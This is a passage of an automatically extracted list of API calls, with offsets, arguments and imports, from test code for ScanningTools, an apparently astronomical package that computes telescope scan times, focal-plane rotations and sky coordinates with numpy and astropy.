'st.get_full_fp_polarization_angles', (['"""./ScanningTools/fp_data/fp_psi.txt"""'], {}), "('./ScanningTools/fp_data/fp_psi.txt')\n", (6804, 6842), True, 'from ScanningTools import ScanningTools as st\n'), ((10124, 10216), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day)\n', (10137, 10216), True, 'from ScanningTools import ScanningTools as st\n'), ((10300, 10338), 'astropy.time.Time', 'Time', (['JD[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0], format='jd', location=loc)\n", (10304, 10338), False, 'from astropy.time import Time\n'), ((10352, 10403), 'astropy.time.Time', 'Time', (['(JD[0] + JD_step[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0] 
+ JD_step[0], format='jd', location=loc)\n", (10356, 10403), False, 'from astropy.time import Time\n'), ((10535, 10627), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day)\n', (10548, 10627), True, 'from ScanningTools import ScanningTools as st\n'), ((10711, 10749), 'astropy.time.Time', 'Time', (['JD[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0], format='jd', location=loc)\n", (10715, 10749), False, 'from astropy.time import Time\n'), ((10763, 10814), 'astropy.time.Time', 'Time', (['(JD[0] + JD_step[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0] + JD_step[0], format='jd', location=loc)\n", (10767, 10814), False, 'from astropy.time import Time\n'), ((11012, 11104), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day)\n', (11025, 11104), True, 'from ScanningTools import ScanningTools as st\n'), ((11188, 11226), 'astropy.time.Time', 'Time', (['JD[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0], format='jd', location=loc)\n", (11192, 11226), False, 'from astropy.time import Time\n'), ((11240, 11291), 'astropy.time.Time', 'Time', (['(JD[0] + JD_step[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0] + JD_step[0], format='jd', location=loc)\n", (11244, 11291), False, 'from astropy.time import Time\n'), ((11589, 11682), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day0'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day0)\n', (11602, 11682), True, 'from ScanningTools import ScanningTools as st\n'), ((11773, 11812), 
'astropy.time.Time', 'Time', (['JD0[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD0[0], format='jd', location=loc)\n", (11777, 11812), False, 'from astropy.time import Time\n'), ((11827, 11880), 'astropy.time.Time', 'Time', (['(JD0[0] + JD_step0[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD0[0] + JD_step0[0], format='jd', location=loc)\n", (11831, 11880), False, 'from astropy.time import Time\n'), ((12049, 12142), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day1)\n', (12062, 12142), True, 'from ScanningTools import ScanningTools as st\n'), ((12230, 12269), 'astropy.time.Time', 'Time', (['JD1[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD1[0], format='jd', location=loc)\n", (12234, 12269), False, 'from astropy.time import Time\n'), ((12284, 12337), 'astropy.time.Time', 'Time', (['(JD1[0] + JD_step1[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD1[0] + JD_step1[0], format='jd', location=loc)\n", (12288, 12337), False, 'from astropy.time import Time\n'), ((12506, 12599), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day2'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day2)\n', (12519, 12599), True, 'from ScanningTools import ScanningTools as st\n'), ((12690, 12729), 'astropy.time.Time', 'Time', (['JD2[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD2[0], format='jd', location=loc)\n", (12694, 12729), False, 'from astropy.time import Time\n'), ((12744, 12797), 'astropy.time.Time', 'Time', (['(JD2[0] + JD_step2[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD2[0] + JD_step2[0], format='jd', location=loc)\n", (12748, 12797), False, 'from astropy.time import Time\n'), ((12966, 13059), 
'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day3'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day3)\n', (12979, 13059), True, 'from ScanningTools import ScanningTools as st\n'), ((13150, 13189), 'astropy.time.Time', 'Time', (['JD3[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD3[0], format='jd', location=loc)\n", (13154, 13189), False, 'from astropy.time import Time\n'), ((13204, 13257), 'astropy.time.Time', 'Time', (['(JD3[0] + JD_step3[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD3[0] + JD_step3[0], format='jd', location=loc)\n", (13208, 13257), False, 'from astropy.time import Time\n'), ((13458, 13552), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start4', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day4'}), '(LCT_start4, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day4)\n', (13471, 13552), True, 'from ScanningTools import ScanningTools as st\n'), ((13643, 13682), 'astropy.time.Time', 'Time', (['JD4[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD4[0], format='jd', location=loc)\n", (13647, 13682), False, 'from astropy.time import Time\n'), ((13697, 13750), 'astropy.time.Time', 'Time', (['(JD4[0] + JD_step4[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD4[0] + JD_step4[0], format='jd', location=loc)\n", (13701, 13750), False, 'from astropy.time import Time\n'), ((14766, 14861), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate1', 'obs_time1'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC, DST\n =DST, day=day1)\n', (14779, 14861), True, 'from ScanningTools import ScanningTools as st\n'), ((14915, 14945), 'ScanningTools.ScanningTools.spin_generator', 'st.spin_generator', (['time1', 'rpm1'], {}), '(time1, 
rpm1)\n', (14932, 14945), True, 'from ScanningTools import ScanningTools as st\n'), ((15055, 15150), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate2', 'obs_time2'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day2'}), '(LCT_start, LCD_start, sampling_rate2, obs_time2, UTC=UTC, DST\n =DST, day=day2)\n', (15068, 15150), True, 'from ScanningTools import ScanningTools as st\n'), ((15204, 15234), 'ScanningTools.ScanningTools.spin_generator', 'st.spin_generator', (['time2', 'rpm2'], {}), '(time2, rpm2)\n', (15221, 15234), True, 'from ScanningTools import ScanningTools as st\n'), ((15344, 15439), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate3', 'obs_time3'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day3'}), '(LCT_start, LCD_start, sampling_rate3, obs_time3, UTC=UTC, DST\n =DST, day=day3)\n', (15357, 15439), True, 'from ScanningTools import ScanningTools as st\n'), ((15493, 15523), 'ScanningTools.ScanningTools.spin_generator', 'st.spin_generator', (['time3', 'rpm3'], {}), '(time3, rpm3)\n', (15510, 15523), True, 'from ScanningTools import ScanningTools as st\n'), ((15686, 15737), 'numpy.radians', 'np.radians', (['([10, 10, 10], [30, 30, 30], [0, 0, 0])'], {}), '(([10, 10, 10], [30, 30, 30], [0, 0, 0]))\n', (15696, 15737), True, 'import numpy as np\n'), ((15751, 15795), 'ScanningTools.ScanningTools.euler_rotation_matrix', 'st.euler_rotation_matrix', (['phi1', 'theta1', 'psi1'], {}), '(phi1, theta1, psi1)\n', (15775, 15795), True, 'from ScanningTools import ScanningTools as st\n'), ((15809, 16003), 'numpy.array', 'np.array', (['[[0.984807753012208, -0.1503837331804353, 0.08682408883346515], [\n 0.17364817766693033, 0.8528685319524433, -0.49240387650610395], [0, \n 0.49999999999999994, 0.8660254037844387]]'], {}), '([[0.984807753012208, -0.1503837331804353, 0.08682408883346515], [\n 0.17364817766693033, 0.8528685319524433, -0.49240387650610395], [0, \n 0.49999999999999994, 
0.8660254037844387]])\n', (15817, 16003), True, 'import numpy as np\n'), ((16074, 16128), 'numpy.radians', 'np.radians', (['([10, 10, 10], [30, 30, 30], [45, 45, 45])'], {}), '(([10, 10, 10], [30, 30, 30], [45, 45, 45]))\n', (16084, 16128), True, 'import numpy as np\n'), ((16142, 16186), 'ScanningTools.ScanningTools.euler_rotation_matrix', 'st.euler_rotation_matrix', (['phi2', 'theta2', 'psi2'], {}), '(phi2, theta2, psi2)\n', (16166, 16186), True, 'from ScanningTools import ScanningTools as st\n'), ((16200, 16411), 'numpy.array', 'np.array', (['[[0.5900268828079848, -0.8027015978320531, 0.08682408883346515], [\n 0.7258569263731611, 0.4802813184352156, -0.49240387650610395], [\n 0.3535533905932737, 0.35355339059327373, 0.8660254037844387]]'], {}), '([[0.5900268828079848, -0.8027015978320531, 0.08682408883346515], [\n 0.7258569263731611, 0.4802813184352156, -0.49240387650610395], [\n 0.3535533905932737, 0.35355339059327373, 0.8660254037844387]])\n', (16208, 16411), True, 'import numpy as np\n'), ((16483, 16536), 'numpy.radians', 'np.radians', (['([10, 10, 10], [30, 30, 30], [45, 0, 45])'], {}), '(([10, 10, 10], [30, 30, 30], [45, 0, 45]))\n', (16493, 16536), True, 'import numpy as np\n'), ((16550, 16594), 'ScanningTools.ScanningTools.euler_rotation_matrix', 'st.euler_rotation_matrix', (['phi3', 'theta3', 'psi3'], {}), '(phi3, theta3, psi3)\n', (16574, 16594), True, 'from ScanningTools import ScanningTools as st\n'), ((16608, 17219), 'numpy.array', 'np.array', (['[[[0.5900268828079848, -0.8027015978320531, 0.08682408883346515], [\n 0.7258569263731611, 0.4802813184352156, -0.49240387650610395], [\n 0.3535533905932737, 0.35355339059327373, 0.8660254037844387]], [[\n 0.984807753012208, -0.1503837331804353, 0.08682408883346515], [\n 0.17364817766693033, 0.8528685319524433, -0.49240387650610395], [0, \n 0.49999999999999994, 0.8660254037844387]], [[0.5900268828079848, -\n 0.8027015978320531, 0.08682408883346515], [0.7258569263731611, \n 0.4802813184352156, 
-0.49240387650610395], [0.3535533905932737, \n 0.35355339059327373, 0.8660254037844387]]]'], {}), '([[[0.5900268828079848, -0.8027015978320531, 0.08682408883346515],\n [0.7258569263731611, 0.4802813184352156, -0.49240387650610395], [\n 0.3535533905932737, 0.35355339059327373, 0.8660254037844387]], [[\n 0.984807753012208, -0.1503837331804353, 0.08682408883346515], [\n 0.17364817766693033, 0.8528685319524433, -0.49240387650610395], [0, \n 0.49999999999999994, 0.8660254037844387]], [[0.5900268828079848, -\n 0.8027015978320531, 0.08682408883346515], [0.7258569263731611, \n 0.4802813184352156, -0.49240387650610395], [0.3535533905932737, \n 0.35355339059327373, 0.8660254037844387]]])\n', (16616, 17219), True, 'import numpy as np\n'), ((17702, 17779), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', '(50)', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'None'}), '(LCT_start, LCD_start, 50, obs_time, UTC=UTC, DST=DST, day=None)\n', (17715, 17779), True, 'from ScanningTools import ScanningTools as st\n'), ((17862, 17933), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time', 'rpm', 'zenith_distance', 'polarization_angle'], {}), '(time, rpm, zenith_distance, polarization_angle)\n', (17885, 17933), True, 'from ScanningTools import ScanningTools as st\n'), ((18640, 18736), 'ScanningTools.ScanningTools.get_full_fp', 'st.get_full_fp', (['"""./ScanningTools/fp_data/fp_theta.txt"""', '"""./ScanningTools/fp_data/fp_phi.txt"""'], {}), "('./ScanningTools/fp_data/fp_theta.txt',\n './ScanningTools/fp_data/fp_phi.txt')\n", (18654, 18736), True, 'from ScanningTools import ScanningTools as st\n'), ((18978, 19073), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate1', 'obs_time1'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC, DST\n =DST, day=day1)\n', (18991, 19073), True, 'from ScanningTools import 
ScanningTools as st\n'), ((19141, 19214), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time1', 'rpm1', 'zenith_distance', 'polarization_angle'], {}), '(time1, rpm1, zenith_distance, polarization_angle)\n', (19164, 19214), True, 'from ScanningTools import ScanningTools as st\n'), ((19297, 19392), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate2', 'obs_time2'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day2'}), '(LCT_start, LCD_start, sampling_rate2, obs_time2, UTC=UTC, DST\n =DST, day=day2)\n', (19310, 19392), True, 'from ScanningTools import ScanningTools as st\n'), ((19460, 19533), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time2', 'rpm2', 'zenith_distance', 'polarization_angle'], {}), '(time2, rpm2, zenith_distance, polarization_angle)\n', (19483, 19533), True, 'from ScanningTools import ScanningTools as st\n'), ((19639, 19683), 'ScanningTools.ScanningTools.euler_rotation_matrix', 'st.euler_rotation_matrix', (['phi1', 'theta1', 'psi1'], {}), '(phi1, theta1, psi1)\n', (19663, 19683), True, 'from ScanningTools import ScanningTools as st\n'), ((19702, 19746), 'ScanningTools.ScanningTools.euler_rotation_matrix', 'st.euler_rotation_matrix', (['phi2', 'theta2', 'psi2'], {}), '(phi2, theta2, psi2)\n', (19726, 19746), True, 'from ScanningTools import ScanningTools as st\n'), ((19771, 19859), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n1', 'cartesian': '(False)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,\n cartesian=False)\n', (19790, 19859), True, 'from ScanningTools import ScanningTools as st\n'), ((19926, 20013), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n1', 'cartesian': '(True)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,\n cartesian=True)\n', 
(19945, 20013), True, 'from ScanningTools import ScanningTools as st\n'), ((20080, 20168), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi2', 'theta2', 'psi2', 'x_fp', 'n_horns', 'time2'], {'n': 'n2', 'cartesian': '(False)'}), '(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2,\n cartesian=False)\n', (20099, 20168), True, 'from ScanningTools import ScanningTools as st\n'), ((20235, 20322), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi2', 'theta2', 'psi2', 'x_fp', 'n_horns', 'time2'], {'n': 'n2', 'cartesian': '(True)'}), '(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2,\n cartesian=True)\n', (20254, 20322), True, 'from ScanningTools import ScanningTools as st\n'), ((20510, 20566), 'ScanningTools.Quaternions.Quaternion.get_quaternion_from_euler', 'q.get_quaternion_from_euler', (['phi1[i]', 'theta1[i]', 'psi1[i]'], {}), '(phi1[i], theta1[i], psi1[i])\n', (20537, 20566), True, 'from ScanningTools.Quaternions import Quaternion as q\n'), ((20831, 20860), 'numpy.random.randint', 'np.random.randint', (['(0)', 'n_horns'], {}), '(0, n_horns)\n', (20848, 20860), True, 'import numpy as np\n'), ((20965, 21021), 'ScanningTools.Quaternions.Quaternion.get_quaternion_from_euler', 'q.get_quaternion_from_euler', (['phi2[j]', 'theta2[j]', 'psi2[j]'], {}), '(phi2[j], theta2[j], psi2[j])\n', (20992, 21021), True, 'from ScanningTools.Quaternions import Quaternion as q\n'), ((21572, 21668), 'ScanningTools.ScanningTools.get_full_fp', 'st.get_full_fp', (['"""./ScanningTools/fp_data/fp_theta.txt"""', '"""./ScanningTools/fp_data/fp_phi.txt"""'], {}), "('./ScanningTools/fp_data/fp_theta.txt',\n './ScanningTools/fp_data/fp_phi.txt')\n", (21586, 21668), True, 'from ScanningTools import ScanningTools as st\n'), ((21848, 21940), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day'}), '(LCT_start, LCD_start, sampling_rate, obs_time, 
UTC=UTC, DST=\n DST, day=day)\n', (21861, 21940), True, 'from ScanningTools import ScanningTools as st\n'), ((22002, 22073), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time', 'rpm', 'zenith_distance', 'polarization_angle'], {}), '(time, rpm, zenith_distance, polarization_angle)\n', (22025, 22073), True, 'from ScanningTools import ScanningTools as st\n'), ((22088, 22175), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi', 'theta', 'psi', 'x_fp', 'n_horns', 'time'], {'n': 'None', 'cartesian': '(False)'}), '(phi, theta, psi, x_fp, n_horns, time, n=None, cartesian\n =False)\n', (22107, 22175), True, 'from ScanningTools import ScanningTools as st\n'), ((22186, 22271), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi', 'theta', 'psi', 'x_fp', 'n_horns', 'time'], {'n': 'n1', 'cartesian': '(False)'}), '(phi, theta, psi, x_fp, n_horns, time, n=n1, cartesian=False\n )\n', (22205, 22271), True, 'from ScanningTools import ScanningTools as st\n'), ((22282, 22367), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi', 'theta', 'psi', 'x_fp', 'n_horns', 'time'], {'n': 'n2', 'cartesian': '(False)'}), '(phi, theta, psi, x_fp, n_horns, time, n=n2, cartesian=False\n )\n', (22301, 22367), True, 'from ScanningTools import ScanningTools as st\n'), ((22381, 22412), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp'], {}), '(fpp)\n', (22407, 22412), True, 'from ScanningTools import ScanningTools as st\n'), ((22433, 22465), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp1'], {}), '(fpp1)\n', (22459, 22465), True, 'from ScanningTools import ScanningTools as st\n'), ((22486, 22518), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp2'], {}), '(fpp2)\n', (22512, 22518), True, 'from ScanningTools import ScanningTools as st\n'), ((22595, 22691), 
'ScanningTools.ScanningTools.get_full_fp', 'st.get_full_fp', (['"""./ScanningTools/fp_data/fp_theta.txt"""', '"""./ScanningTools/fp_data/fp_phi.txt"""'], {}), "('./ScanningTools/fp_data/fp_theta.txt',\n './ScanningTools/fp_data/fp_phi.txt')\n", (22609, 22691), True, 'from ScanningTools import ScanningTools as st\n'), ((22896, 22989), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day1)\n', (22909, 22989), True, 'from ScanningTools import ScanningTools as st\n'), ((23057, 23150), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day2'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day2)\n', (23070, 23150), True, 'from ScanningTools import ScanningTools as st\n'), ((23218, 23290), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time1', 'rpm', 'zenith_distance', 'polarization_angle'], {}), '(time1, rpm, zenith_distance, polarization_angle)\n', (23241, 23290), True, 'from ScanningTools import ScanningTools as st\n'), ((23373, 23445), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time2', 'rpm', 'zenith_distance', 'polarization_angle'], {}), '(time2, rpm, zenith_distance, polarization_angle)\n', (23396, 23445), True, 'from ScanningTools import ScanningTools as st\n'), ((23516, 23604), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n1', 'cartesian': '(False)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,\n cartesian=False)\n', (23535, 23604), True, 'from ScanningTools import ScanningTools as st\n'), ((23616, 23704), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', 
(['phi2', 'theta2', 'psi2', 'x_fp', 'n_horns', 'time2'], {'n': 'n1', 'cartesian': '(False)'}), '(phi2, theta2, psi2, x_fp, n_horns, time2, n=n1,\n cartesian=False)\n', (23635, 23704), True, 'from ScanningTools import ScanningTools as st\n'), ((23716, 23804), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n2', 'cartesian': '(False)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n2,\n cartesian=False)\n', (23735, 23804), True, 'from ScanningTools import ScanningTools as st\n'), ((23816, 23904), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi2', 'theta2', 'psi2', 'x_fp', 'n_horns', 'time2'], {'n': 'n2', 'cartesian': '(False)'}), '(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2,\n cartesian=False)\n', (23835, 23904), True, 'from ScanningTools import ScanningTools as st\n'), ((23921, 23953), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp1'], {}), '(fpp1)\n', (23947, 23953), True, 'from ScanningTools import ScanningTools as st\n'), ((23974, 24006), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp2'], {}), '(fpp2)\n', (24000, 24006), True, 'from ScanningTools import ScanningTools as st\n'), ((24027, 24059), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp3'], {}), '(fpp3)\n', (24053, 24059), True, 'from ScanningTools import ScanningTools as st\n'), ((24080, 24112), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp4'], {}), '(fpp4)\n', (24106, 24112), True, 'from ScanningTools import ScanningTools as st\n'), ((24133, 24177), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1', 'loc', 'Alt1', 'Az1'], {}), '(JD1, loc, Alt1, Az1)\n', (24156, 24177), True, 'from ScanningTools import ScanningTools as st\n'), ((24221, 24265), 
'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD2', 'loc', 'Alt2', 'Az2'], {}), '(JD2, loc, Alt2, Az2)\n', (24244, 24265), True, 'from ScanningTools import ScanningTools as st\n'), ((24310, 24354), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1', 'loc', 'Alt3', 'Az3'], {}), '(JD1, loc, Alt3, Az3)\n', (24333, 24354), True, 'from ScanningTools import ScanningTools as st\n'), ((24398, 24442), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD2', 'loc', 'Alt4', 'Az4'], {}), '(JD2, loc, Alt4, Az4)\n', (24421, 24442), True, 'from ScanningTools import ScanningTools as st\n'), ((24489, 24536), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1[0]', 'loc', 'Alt1', 'Az1'], {}), '(JD1[0], loc, Alt1, Az1)\n', (24512, 24536), True, 'from ScanningTools import ScanningTools as st\n'), ((26219, 26315), 'ScanningTools.ScanningTools.get_full_fp', 'st.get_full_fp', (['"""./ScanningTools/fp_data/fp_theta.txt"""', '"""./ScanningTools/fp_data/fp_phi.txt"""'], {}), "('./ScanningTools/fp_data/fp_theta.txt',\n './ScanningTools/fp_data/fp_phi.txt')\n", (26233, 26315), True, 'from ScanningTools import ScanningTools as st\n'), ((26505, 26598), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day1)\n', (26518, 26598), True, 'from ScanningTools import ScanningTools as st\n'), ((26666, 26738), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time1', 'rpm', 'zenith_distance', 'polarization_angle'], {}), '(time1, rpm, zenith_distance, polarization_angle)\n', (26689, 26738), True, 'from ScanningTools import ScanningTools as st\n'), ((26807, 26895), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 
'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n1', 'cartesian': '(False)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,\n cartesian=False)\n', (26826, 26895), True, 'from ScanningTools import ScanningTools as st\n'), ((26907, 26995), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n2', 'cartesian': '(False)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n2,\n cartesian=False)\n', (26926, 26995), True, 'from ScanningTools import ScanningTools as st\n'), ((27012, 27044), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp1'], {}), '(fpp1)\n', (27038, 27044), True, 'from ScanningTools import ScanningTools as st\n'), ((27065, 27097), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp3'], {}), '(fpp3)\n', (27091, 27097), True, 'from ScanningTools import ScanningTools as st\n'), ((27118, 27162), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1', 'loc', 'Alt1', 'Az1'], {}), '(JD1, loc, Alt1, Az1)\n', (27141, 27162), True, 'from ScanningTools import ScanningTools as st\n'), ((27206, 27250), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1', 'loc', 'Alt3', 'Az3'], {}), '(JD1, loc, Alt3, Az3)\n', (27229, 27250), True, 'from ScanningTools import ScanningTools as st\n'), ((27296, 27350), 'ScanningTools.ScanningTools.get_practical_icrs_coordinates', 'st.get_practical_icrs_coordinates', (['JD1', 'loc', 'Alt1', 'Az1'], {}), '(JD1, loc, Alt1, Az1)\n', (27329, 27350), True, 'from ScanningTools import ScanningTools as st\n'), ((27394, 27448), 'ScanningTools.ScanningTools.get_practical_icrs_coordinates', 'st.get_practical_icrs_coordinates', (['JD1', 'loc', 'Alt3', 'Az3'], {}), '(JD1, loc, Alt3, Az3)\n', (27427, 27448), True, 'from ScanningTools import ScanningTools as st\n'), ((27489, 27518), 'ScanningTools.ScanningTools.sex2dec', 
'st.sex2dec', (['pointing_accuracy'], {}), '(pointing_accuracy)\n', (27499, 27518), True, 'from ScanningTools import ScanningTools as st\n'), ((28239, 28331), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day)\n', (28252, 28331), True, 'from ScanningTools import ScanningTools as st\n'), ((28399, 28494), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate1', 'obs_time1'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC, DST\n =DST, day=day1)\n', (28412, 28494), True, 'from ScanningTools import ScanningTools as st\n'), ((28559, 28627), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time', 'rpm', 'zenith_distance', 'boresight_angle'], {}), '(time, rpm, zenith_distance, boresight_angle)\n', (28582, 28627), True, 'from ScanningTools import ScanningTools as st\n'), ((28657, 28728), 'ScanningTools.ScanningTools.get_engine_rotations', 